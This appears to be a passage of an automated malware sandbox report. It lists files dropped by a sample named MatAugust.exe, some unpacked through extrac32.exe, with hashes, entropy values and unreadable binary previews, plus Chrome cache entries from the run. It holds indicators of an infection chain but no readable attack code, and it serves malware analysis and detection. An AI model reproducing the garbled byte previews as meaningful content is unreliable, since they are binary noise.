SSDEEP:	1536:V6+L9+YJmYhfbh9amXsJfChmKmtrlu70t37:VvQqDxs4hrmxA7kL
MD5:	186B65432BA1E669E027335DAE6BAB2A
SHA1:	A0A328312E0233BBC7EFE4EBF7EAE92C92DAC46B
SHA-256:	90C1770F14679AA9A49F8AC342464AA9869B6C98579CA4E14660AD5C405571E3
SHA-512:	D102AD48650B9C1781420DD6631457F2C7D0ABAF646282E84D88DF3860D29F456789ACC2103EEAE105177F9AABAA162E06B655865456F2B7550DB7C033A419A4
Malicious:	false
Preview:	..._'.nQ..;x4.i.=.M...Ye..Hl...../o.\...E'....$]...K..d.#...`........-...B.s_.h.....Sm9.frv.......M5...&..cIE..o..L...}.l..4...^..y.L.N...4J\.`.!...y.H.Y~..IG3I_.Z..e.CV.."....;b....5.._..iV"W,../e.... .(t.~.,Y7..d..r6v@.#.,..:.d......ZQ..........6}...O`..}..f.B..A....x=..6.'.Se.xzD./.g.S.`.6.:...a.Z.........A0..#.zZ...1x...'..pO....s.A..H...W$...(.F.}.Fj.l....6x....$ .....`.n.....AV.7.O<.r....N....f..o`5.).nP3...D..!...''..a..........+m.\c.!s0..u8-X[rK5.E.a.S.2..jw..xI>...A+Y+7@..<j...`..7Ig..6@z..yH1a.C/...l\|S.....-...Z..c..h....AF...'.=.dIPtK[.ua....}..Q..\s..Q.T.........`..":%[.o$!G...C(A...a?.......o..?.;.o...nA....m.S...{M.Pg.?k..UV].N.r..0..Tw......z..<C.s.......%.w.......i......#..EA...-.BF..H....C0.......}.6'.w-..O..!.c1q...?.0_ .....>r..#.)..z.Vx.a..7...R..r.^...p..\......Zj...Jz.J#.N.\.c.G.$<...l.d.,.];.M...S..[.W../5a.6K.E.D....8bd...^.F......$.G.w...80.h...=.^..G.....jR.S....^.:...,:....C.b&.....+.....q)D.R......6.m.+0.co...+.R...u

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Passenger

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	7467
Entropy (8bit):	7.605921032882955
Encrypted:	false
SSDEEP:	192:/H6N8VEVFJ84kcGNq4/C+Q3ISVSWMZMQ3rw:/rVEVFJ8ZcGwGBk7/UMQ3rw
MD5:	A5C6DD2B4965F95822D71AB50D56C1C8
SHA1:	0B3B429D4FC992A55B0B77AA05499E80FD550FC8
SHA-256:	E4727DFC91D01D58DD6D7242A3BC6440E8F3A1606101D85B78DB3B316FF91BF2
SHA-512:	FA3FA852049B240E866D695D2502A3C7AE44BBE0D8C3D3C648EC8FF5523CA274F8DA64C62E139F29B3B203633BCB475A671280CFC46FA3630605EF0B51DF9FF9
Malicious:	false
Preview:	.9...t.Qg..Y.....[A.......\|k..H;.^q..w.WP......2lnF.;....}.......X....&-`.d...H}.)..f..+....";Y.}..#....). .%\|.X.[.....tgo..!sN....9v.\...\|.)F.....1.I4V(F.......x.t.2.............T.Ia.S..&zp2....5..U..ye.{.$.;..!.f...E...1..70..3...0j0Z1.0...U....BE1.0...U....GlobalSign nv-sa100...U...'GlobalSign CodeSigning CA - SHA256 - G3..8.Hn...04.J0...`.H.e.........0....H......1...+.....7...0...+.....7...1.0...+.....7...0/...H......1". .g.6..l....#..t.X..n\|$>.......0^..+.....7...1P0N.". .A.u.t.o.I.t. .v.3. .S.c.r.i.p.t.(.&https://www.autoitscript.com/autoit3/ 0....H............>./.f..m..6.5.f..V..6.......E.]....Q...).S.......A20......\|.aH\|A..B;.L:..,...<.d>m._.Ij..Fx...2........~,.P.......u.um..S..7c.]..\f....e{W.XM&...b.=4..)....C.O).@.....&OX.29\.K.bG..;c-f..:.. .K..u.....O.riW....u5.GU[..zoH.e..i.....0RZ....5....0.....+.....7...1...0......H..........0......1.0...`.H.e....0....*.H..............0.......+.....2..010...`.H.e....... .s....Y....8.z..^.....&..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Pour

Download File

Process:	C:\Users\user\Desktop\MatAugust.exe
File Type:	data
Category:	dropped
Size (bytes):	59392
Entropy (8bit):	7.996930624097006
Encrypted:	true
SSDEEP:	768:jZ5wVuN14R4mgnrRkUqr39udAc10UacQ39jWRL/7Xo4vMzN3Nyi7yKVLIHsb4:j1Y0rRir39GAceUQ9Ka4vMxNT7yW0K4
MD5:	65CE095A10F89F4F63D02AA05B99379B
SHA1:	781A9C3E1105DFB9027A375D5A96092A8B6AFBC8
SHA-256:	0A696FF4BED86CE74790651A900A29B565B73CFBB359498E6EDCB157EB435C78
SHA-512:	981B42C10F7A055B8D54007811662AE1408FF7C09748DDB353FE7F075F4EDC54E48917F7669680BFD46DC2876B1A18C5CDEA1DF2C5D642620BDA3599E3A61A6D
Malicious:	false
Preview:	..a..c...{n%)B...Cb.L}{.{0>.../...<.h.y.{.......r-t.v..c.#1........>0gz,.......=.....jz....'......k..."C$.p_.n...(.......Z..(.O....X..^..QmQ].<.4..q...a..5}.JlO.........\|?E< -...sZ.....?..w.e."T.wE....Xt.\|23c..7....f...GX...N........E...F/h..s..:....N0.9..o.<>..y...C......fs..0u..:.......O......e.Q...;._..b.q..1^..9...1.}...}...K.3..9..SZ.."\...P....5q...!....az..2.4..Y.^.6..O..r.......B.........H#........et.w..c..A;.?\|....="......e.}.....zQ.n.?..u....z...h.~!..=..0...........~.....@........<V...1..P...z<.......%.,Z.........Y..].....^.[.;-.eh....6.........5.uP...=`.c"qd8.R..A...2.......... ..p.%.[t..pV......%..C.=..m."....h.u=o......>#../.t:..Pc.i..R......g.@.."...%.Q. %..d=$j.4..H.)...;u..9r.E....%.{.C....{...t(...;`x&C..U>...en.i..Nj..D.FNN.r...iA.....$...k.\mW.....8..S..."q..O7&&..O$..N.1,....B..LQ..w+..u.Hl3..v.H.e{x....U.P.G...a.I,7.....]..i..uS*md... ...a.6.....V...?9b.4]$..s&U..t...[...ly$....H...t.WBJ....bi..$..s5.(...:.L

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Refugees

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	78848
Entropy (8bit):	6.656810356811789
Encrypted:	false
SSDEEP:	1536:Ku2IwNnPEBiqXv+G/UXT6TvY464qvI932eOypvcLSDOSpZ+Sh+IU:ccBiqXvpgF4qv+32eOyKODOSpQSq
MD5:	400217C87A4BDF536EF5173EBC5B8927
SHA1:	4014B78EB595CC739F5E5915D909CC85AC83B2CE
SHA-256:	C4EC199F43F733B29203D0F3FE504E4E2AD59580427962D60C27131A3EA9D815
SHA-512:	689FCF84FAAD7817E46A55D9B6243110D674E75CD5EC7EA5888663EBB2B96E943FC3E6CD895451448A552B38217EFE38C3C57A572304A09F90E782D5B5DD5177
Malicious:	false
Preview:	.U..3..}.csm....].j.h.L.......u...u..B.....t..u..z...Yj..f...Y.e...=`.M........3.@.X.M....E......}...u<....L.....j Y+.3...3..\.M.;.t.3.3.PPP.........I...h..M......u.h..M..8...Y.e....u.h..I.h..I.....YYh..I.h..I.....YY..u...`.M...E......'.....u,.u..*....E...0.........e......u.j......Y..R.....U.........t d.0....@h.....u..u...\.I.P....I..u..O...Y.u.....I..j.....I....u.2..MZ..f9.u.A<...8PE..u.....f9H.u.xt.v............U..QQ...L.3.E..e...E.Ph..J.j.....I...t#Vh..J..u.....I.....t..u.......I...^.}..t..u.....I..M.3......]..U..E..\.M.].j.j.j..........j.j.j...........U..j.j..u........]..U....L....j Y+.3...3...L.9.\.M...E....u..S...Y.\.M.]..U..j.j..u..l......]..U..A...+...V3....;.....#.t..U.F...I.;.u.^].....U...u..d.M.....]..U..Q...L.3.E.V.........t..u.......I...Y..t.3.@..3..M.3.^.....].j.h..L..3....e..j..Y...Y.e...5..L.....35d.M...u..E.............@....u.j..h...Y.j.h .L......e..j......Y.e...5..L.....35d.M...u..u.. ...Y.d.M..E.................u.j......Y.h

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Relative

Download File

Process:	C:\Users\user\Desktop\MatAugust.exe
File Type:	data
Category:	dropped
Size (bytes):	88064
Entropy (8bit):	7.998091767930921
Encrypted:	true
SSDEEP:	1536:MAbgO1x1yTQidbqonV0y5YkjeOyCFquK//N+ouxnx67/oZS116dS1qH01D4/:MI1BiLz5fe0Fs/uJxe/ocCdIqH01s/
MD5:	F03D187A839A718B9A0F351C2A16AF30
SHA1:	DB3AA26DE737192269A19160BCC6712000104C93
SHA-256:	D9E0E85DAB575AFC1C9E886F0117874D1CDBD83A1BE319E905B62C2015524701
SHA-512:	2A4CA34D7D7220E4222BA1BE8918709C9B297D7623B74896C0AD744C008B9CE1A1BEF63CFCD3BA6AB18DA236FA3DC34C4A718610D7ADF20821BC7BD2A7EBA7E6
Malicious:	false
Preview:	0...@r.[.....Z..<..^ F.Oecc.....P........I......{........:Y..uz[..v2..O...'....uP.P..+........UJc.D.....<...Z:....#.......<~q.&..i...+.N..E..V.h..T./....u..T...u!.t.....R.6Rp..`O.......u.......\q....(S...X.._#B.-...[e.d....AL\..bo...!..F:(m..'..V[..EW....>sX...O:s..P.f..&..x.8l."M..0.....ct.}..F...o.h...{a..r....@..p9.....S..[....P........_o.5..m..M.=.OY{..rT......0..c.L#........ ...y..k...."..;.L..=..a4h7.l........4...~..0..0.TT^.....XRH.a..@i.GQ.e/....2...l....m.k....Z{c<..j.].8s..=P....7.i?...j=.".m.7..TH...b.......l..........9.T..$p"I1.X...S.).w}..% .C..........$b..N....`.A~.[..+uL..~..F.'?yN..T..)....5.cK._d.o.n..s.q...4r.......zi......(..g.L...L..._O,.C....9.<.IpF.~.....3.Y....jT.n...^W.x..6I%Qg..4.n.P.?.....<...... ..RW...X.~..%S.eQ..k.'&.&O..>.../f<.J{q..n..$...$Ot........7}j.p.,&.z.i...\|b5...?......v..S.n+_.A.Ap....@...&....F.N.....M..;..[V.p2.6.H.lO.#-.j.h......$..v}l....H.f.Z.H..Y../..cQ.$....2.....B.t.Ktv.)....nG...Y......g.._.[..1C.PO

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Removal

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	87040
Entropy (8bit):	6.695029179104762
Encrypted:	false
SSDEEP:	1536:WdTmHwANUQlHS3cctlxWboHdMJ3RraSXL21rKoUn9r5C03Eq30BcrTrhCXQ:WdTmRxlHS3NxrHSBRtNPnj0nEoXQ
MD5:	6707DFF65E17B5C01F303BDC514168A4
SHA1:	AB642DF7A78AE1C4442F4417F7E85A50C88D4295
SHA-256:	A5F8D17FEDD6D0B446F68F3C92BD4D103A116D107C68E33E0D13299C04875CC2
SHA-512:	1CB6C0A4A08C11F11D3FFD2F9436AB516D81E7A9A22446A70695CDBCFC82B54E7D2CE6717E974725B26922AE0B3F35C8991DAC9AD23421C8A480816D1A5EC6AB
Malicious:	false
Preview:	...U..U......:...t.......Q...g....U..M..E......U..e....$."2E....._...R..p.I.j..u..w....I....J......j..`....5......}...j..M.r.........j..u..>........Q...~....................j...................j..u..?...............C..F.............6...s......3.E..............Q.7.........E..t .M..t....QPV.........u..........u..V...f..0..t...j................J..H..J..H..J..H....a........G..F..T........K....3.......j..s..f.......X....}...U.........................C..E......]........E.P.E.PV.........K....V..M....f.x..uV.8.uQ.D..f.x..u$.M..U..m.....E......]..i...H.E..`.....H.......F........@.Pjr.X.........H.......F........@.Ph.....3.........M.j.jv."........h....E.P./...m.........@...Ph...............e.E...@...@...E...@.B.E...E...E...E...E...E../E...@...@.l/E...@../E../E../E../E../E../E.j.h......`#M.............6....w....t..@...j.@P.....v..k.....M...........,.................'...;.D)M.}3.@)M........t%.H...t...$....RQ.0....I.....w.........)M......c.........................5M.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Severe

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	109568
Entropy (8bit):	6.672418356042835
Encrypted:	false
SSDEEP:	1536:HFrbCyI7P4Cxi8q0vQEcmFdni8yDGVFE5gOHu1CwCMIBZwneAJu7QnswIPumV3B0:HU4CE0Imbi80PtCZEMnVIPPBxT/sZr
MD5:	ECFF310168B297B43DDDDB0A2F16B9C5
SHA1:	C08340C4388C98A938910FC4E7367EB745E265F8
SHA-256:	1F3A13E7801C043733D22EF115BAD8557B7DE5C2B3B7BCB96167F1D7CC266D57
SHA-512:	B195F161688095BE706080295C52D0A4FD8F6899463BF6F421CDAD5C8216F3848585D6F1DEA691C4A1ABC5C0E2FF3E13360F3CD1E5289B9C28BACCA17C419F89
Malicious:	false
Preview:	......A.E...........p=J.......9M.u..}...........E.......A..s...........E.{b.....\9E.uY.}..uS.E.QQ..$.......E.YY.......Au.......p=J....u ...........z....u......=J.......E...3.].j.h.L....3..u..>j.....Y.}..E.P.s...Y......t..x..x..8.x..H...E................u.j.....Y..U..E.3...E..H..E..H..E..H...E..H..E..H..E..H..E......]..U..QS..l.M.VW.=p.M...........]..A.7..tS.F......u.V.I...Y.V... ............u..].......u.V.6...Y...;.u..E.. ._^[..].E..0..j8j......j..../..........t.H....j.h...... P.P....7.. ...F....V.....Y..U....3.S.].VW.}.u.j.Yj ..........M..u..C._....f9>t....3..at!..rt...w.................C..............K...U.2.U..U....m....f..........S.pt\+..........tB...t4...t'...t......u....m...u.....4............S......s...m.2..s.E.PS.}...Y.].m...u..;...U....T..Tt@...t3...t"...t..........S.z....&.E.PS......E.PS......S.......S.....U.Y..m.3.......4F...........m...t....f9>t...u.3.f9........C......j.hD?J.V.......................f9>t.f.>=ur...f9>t.j.hL?J.V.o........u...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Trees

Download File

Process:	C:\Users\user\Desktop\MatAugust.exe
File Type:	data
Category:	dropped
Size (bytes):	11126
Entropy (8bit):	7.982118783650782
Encrypted:	false
SSDEEP:	192:mtAfwr137nxUJrSixE7A6oAkdLST7arHuKJbYcfw11kqptGhbuHq1dh6LGsWLr48:YZrnGxSimERAkRSnGHuKJbYn11kstGhT
MD5:	0D0474539A350D4B97466E99C0E94558
SHA1:	609B7DB79FE1707BB3E3A42081A34FE5A91D5B16
SHA-256:	3F100E3BF1A3884C39F0E1EAD167B23C5CD8AAD9F7AD82A2D234372CC85D370C
SHA-512:	5D6AED16304EE56A98A0EAAEBF8EFAD1EC932AB216ABDB880057872C03D3AE024A974AF31784E97B189DD2487245155B2D5C633D9847FB225A40C73A5080AB55
Malicious:	false
Preview:	..@..$...y.\b.........y.[9....(&...";...)INR:i{.....5...e..M......w..S..&..[...p...b....?.T.....u..@....T.t....d?..g......zq..b.R.L.=.7....+n}a...L.....\.....E. .0..?...N0........>.......D.8.3.)..j..0e..x.9....S.S.........>J.6?s.g.S....ZR.0..s.... \|U.....U.q.\...4/O.WS..G........0lQn..Err>T:.....$....O..r.}..,I.../]<.r..t...Q.-......./........D'......T5.....fc..K...&L...?.t7....7#~.....?%+Q...'.}.nZCu......nX.Q....b...^e.....'......'.w..[p..:(q.?....9t8.NJ.N..w.V....@..Sy..TE..M...\|.C..1....(m8L..}..,K..n. e..^.G...<=nK....X..c..E..NQ'........JI!.zB.]...s.F#F^'G.l.....k...2IQ....g.....j..8:.aR....-&m"...U......5(W.\....?...s.T.k.pN..`..@..m.o.'.4Vf...l,.tN..P.:'....W.v.M!.R..y...&_...._..V$.......kE9.u.36....l.3....\|..'.o.m..Ip...S..........z.?.'.A..-HROz.......+..z.W.s..;....Zc^`4.^.,..Z.lJd..9%,.\...p.An.b..KT.\|..On&.;..6R.V.F6".4.*.7!k.uY..`....s.^8....In..BA.`..[.F.F...........FQ..\.z..E$!..N6;c.j.A..u..X.....H.x.)..Sr...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Zero

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	145408
Entropy (8bit):	6.432264190600097
Encrypted:	false
SSDEEP:	3072:vg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laW2UDQWf05mjn:o5vPeDkjGgQaE/loUDtf0an
MD5:	F45A564977515AF44D3341B52C62ECAC
SHA1:	321EE844C7CDA93C58164B1AA6E9797BE5182EF0
SHA-256:	678996763570901D3ED13F16B0EC8B867E3F38B392E6E1A9E4470DBFBE26FBB1
SHA-512:	4F2921C01AF3E0752526B37F76C3A79326E1FEBA96F4AD20CC755EC64DB3988987E902927AFECF352E85B7C23F6108FDAFE550EE7286830E4556FD9217768EFD
Malicious:	false
Preview:	t.Q......T)M..... ...`)M...T)M.;5d)M.u....\|.....8.u.N...5d)M...X)M.^...v..D...8.t.]...I..X)M.j..4......T)M.YY..X)M..$....X)M....v..T)M...x)M....t)M...T...V..Np......NT....N$....N....h....V.C...YY..^...U..VW.}.........M...tF.E.S..t.;.....uH.^.....Q.........;...a...........h....V......E.YY..t.[j.j..7..X.I._^].....u.........M...t...6..V..j..N..V..F..4......F.YY.N.^.$...SVW..j._..l...............u.Nl.....N(...h....V.U...YY_..^[...U...u...(M......U...t...@)M.......y..u&...)M...u...M.........Qj..u...x.I.].....)M...U...u...(M..H.....@)M.......q.P.....j..u.j..u...x.I.]...U..M....t.W.}.........._]...V..4.I...(M.P..........t...@)M...j.....0.....^...U....SVW.}..E.P..7....I..E.l....E...p....E.PV..x.I..M.E.;.t...u.;.x...uw.s..5..I.......f#.j.f.E.X.s.....E...u.f......f#.j.X...f.M..E.;.\|..........}..t...\|...;.......;....}..t......._^[.....}....t.....x.....s.......U......(M.V.u.WV.......@)M.....8..........;u.........M...E......Q.u.j V..x.I._^....U......\SVW.u...(M..

Chrome Cache Entry: 85

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (6032)
Category:	downloaded
Size (bytes):	6037
Entropy (8bit):	5.827180870518457
Encrypted:	false
SSDEEP:	96:mWSZF1liJIN6666W5MMRet0twPmZVHN2JBj8as0SSPgLHx1gFQhJ16K+HhB3S+XD:HaFT7N6666WSM4t0zYhHNoLqQ316K9+z
MD5:	445660FB50C168CCF9E939191BCB7C63
SHA1:	4A5EF7121F759F6194F7C9F510CB0C0798EFBAB9
SHA-256:	D150FEFC2B17F51EA064322C07C2F52E026A0C27B43B02109F232EAE161AC991
SHA-512:	B4CEADE613EBEE44B8179EAEABD6FC5395100DF1204707ACBC532A6266353D2500FEA5429B9D54788BCCE7D80154A249C84E995EFFBEE3F3219771A3F5A02A97
Malicious:	false
URL:	https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
Preview:	)]}'.["",["minnesota vikings","texas vehicle inspections","mexico tequila lake","t coronae borealis nova","roblox jujutsu infinite codes","nosferatu movie box office","aurora borealis northern lights forecast","soldier salute trackwrestling"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"google:entityinfo":"CggvbS8wNTFxNRINRm9vdGJhbGwgdGVhbTKvHWRhdGE6aW1hZ2UvanBlZztiYXNlNjQsLzlqLzRBQVFTa1pKUmdBQkFRQUFBUUFCQUFELzJ3Q0VBQWtHQndnSEJna0lCd2dLQ2drTERSWVBEUXdNRFJzVUZSQVdJQjBpSWlBZEh4OGtLRFFzSkNZeEp4OGZMVDB0TVRVM09qbzZJeXMvUkQ4NFF6UTVPamNCQ2dvS0RRd05HZzhQR2pjbEh5VTNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTi8vQUFCRUlBRUFBUUFNQkVRQUNFUUVERVFIL3hBQWFBQUFEQVFFQkFRQUFBQUFBQUFBQUFBQUZCZ2NFQXdFQy84UUFOQkFBQVFRQkFnUUVCQVVEQlFBQUFBQUFBUUlEQkJFRkJpRUFFakZCQnhNaVVSUmhjWkVWTW9HeHdrSnlvUllqSkZKaS84UUFHZ0VBQWdNQkFRQUFBQUFBQUFBQUFBQUFBd1FCQWdVQUJ

Chrome Cache Entry: 86

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1395)
Category:	downloaded
Size (bytes):	117446
Entropy (8bit):	5.490775275046353
Encrypted:	false
SSDEEP:	3072:T2yvefrtJUEgK3Cvw3wWs/ZuTZVL/G1kL:T2y4tJbDK0L/G1kL
MD5:	942EA4F96889BAE7D3C59C0724AB2208
SHA1:	033DDF473319500621D8EBB6961C4278E27222A7
SHA-256:	F59F7F32422E311462A6A6307D90CA75FE87FA11E6D481534A6F28BFCCF63B03
SHA-512:	C3F27662D08AA00ECBC910C39F6429C2F4CBC7CB5FC9083F63390047BACAF8CD7A83C3D6BBE7718F699DAE2ADA486F9E0CAED59BC3043491EECD9734EC32D92F
Malicious:	false
URL:	"https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.ZpMpph_5a4M.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo_c5__TAiALeuHoQOKG0BnSpdbJrQ/cb=gapi.loaded_0"
Preview:	gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a\|\|[]};(0,_._F_toggles_initialize)([]);.var ca,da,ha,ma,xa,Aa,Ba;ca=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};.ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.la=ha(this);ma=function(a,b){if(b)a:{var c=_.la;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}};.ma("Symbol",function(a){if(a)return a;var b

Chrome Cache Entry: 87

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	29
Entropy (8bit):	3.9353986674667634
Encrypted:	false
SSDEEP:	3:VQAOx/1n:VQAOd1n
MD5:	6FED308183D5DFC421602548615204AF
SHA1:	0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
SHA-256:	4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
SHA-512:	A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
Malicious:	false
URL:	https://www.google.com/async/newtab_promos
Preview:	)]}'.{"update":{"promos":{}}}

Chrome Cache Entry: 88

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65531)
Category:	downloaded
Size (bytes):	132739
Entropy (8bit):	5.43657577018065
Encrypted:	false
SSDEEP:	3072:fYkJQ7O4N5dTm+syHEt4W3XdQ4Q6RuSr/nUW2i6o:fNQ7HTt/sHdQ4Q6RDfUW8o
MD5:	8E7325F2157A6FA8940C2F580FE33CBD
SHA1:	A3F5821F6E519BE389C70D49C649C7E41C06D042
SHA-256:	E86FE5EE7A186578C5AE1B23D253451AA4F50BA91D06FB3612F45C0E98CC76D9
SHA-512:	65171E03DD59DD5DC5F16FACC9F4B83CEE4AE1F1A0E2AC730B4B555FA74E0BAA5BEB392D3A0ED1A5051037A16A75CE29C1519DDFF0AC093E389014A6B96B0EF0
Malicious:	false
URL:	https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
Preview:	)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

Chrome Cache Entry: 89

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2410)
Category:	downloaded
Size (bytes):	175897
Entropy (8bit):	5.549876394125764
Encrypted:	false
SSDEEP:	3072:t0PuJ7UV1+ApsOC3Ocr4ONnv4clQfOQMmzIWrBQoSpFMgDuq1HBGANYmYALJQIfr:t0PuJQ+ApsOOFZNnvFlqOQMmsWrBQoSd
MD5:	2368B9A3E1E7C13C00884BE7FA1F0DFC
SHA1:	8F88AD448B22177E2BDA0484648C23CA1D2AA09E
SHA-256:	577E04E2F3AB34D53B7F9D2F6DE45A4ECE86218BEC656B01DCAFF1BF6D218504
SHA-512:	105D51DE8FADDE21A134ACA185AA5C6D469B835B77BEBEC55A7E90C449F29FCC1F33DAF5D86AA98B3528722A8F533800F5146CCA600BC201712EBC9281730201
Malicious:	false
URL:	"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.otmEBJ358uU.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTu0yU9RTMfNNC-LVUmaaNKwIO136g"
Preview:	this.gbar_=this.gbar_\|\|{};(function(_){var window=this;.try{._.Ui=function(a){if(4&a)return 4096&a?4096:8192&a?8192:0};_.Vi=class extends _.Q{constructor(a){super(a)}};.}catch(e){_._DumpException(e)}.try{.var Wi,Xi,aj,dj,cj,Zi,bj;Wi=function(a){try{return a.toString().indexOf("[native code]")!==-1?a:null}catch(b){return null}};Xi=function(){_.Ka()};aj=function(a,b){(_.Yi\|\|(_.Yi=new Zi)).set(a,b);(_.$i\|\|(_.$i=new Zi)).set(b,a)};dj=function(a){if(bj===void 0){const b=new cj([],{});bj=Array.prototype.concat.call([],b).length===1}bj&&typeof Symbol==="function"&&Symbol.isConcatSpreadable&&(a[Symbol.isConcatSpreadable]=!0)};_.ej=function(a,b,c){a=_.rb(a,b,c);return Array.isArray(a)?a:_.Ac};._.fj=function(a,b){a=2&b?a\|2:a&-3;return(a\|32)&-2049};_.gj=function(a,b){a===0&&(a=_.fj(a,b));return a\|1};_.hj=function(a){return!!(2&a)&&!!(4&a)\|\|!!(2048&a)};_.ij=function(a,b,c){32&b&&c\|\|(a&=-33);return a};._.lj=function(a,b,c,d,e,f,g){a=a.ha;var h=!!(2&b);e=h?1:e;f=!!f;g&&(g=!h);h=_.ej(a,b,d);var k=h[_

Chrome Cache Entry: 90

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (5162), with no line terminators
Category:	downloaded
Size (bytes):	5162
Entropy (8bit):	5.3503139230837595
Encrypted:	false
SSDEEP:	96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
MD5:	7977D5A9F0D7D67DE08DECF635B4B519
SHA1:	4A66E5FC1143241897F407CEB5C08C36767726C1
SHA-256:	FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
SHA-512:	8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
Malicious:	false
URL:	"https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTs4SLbgh5FvGZPW_Ny7TyTdXfy6xA"
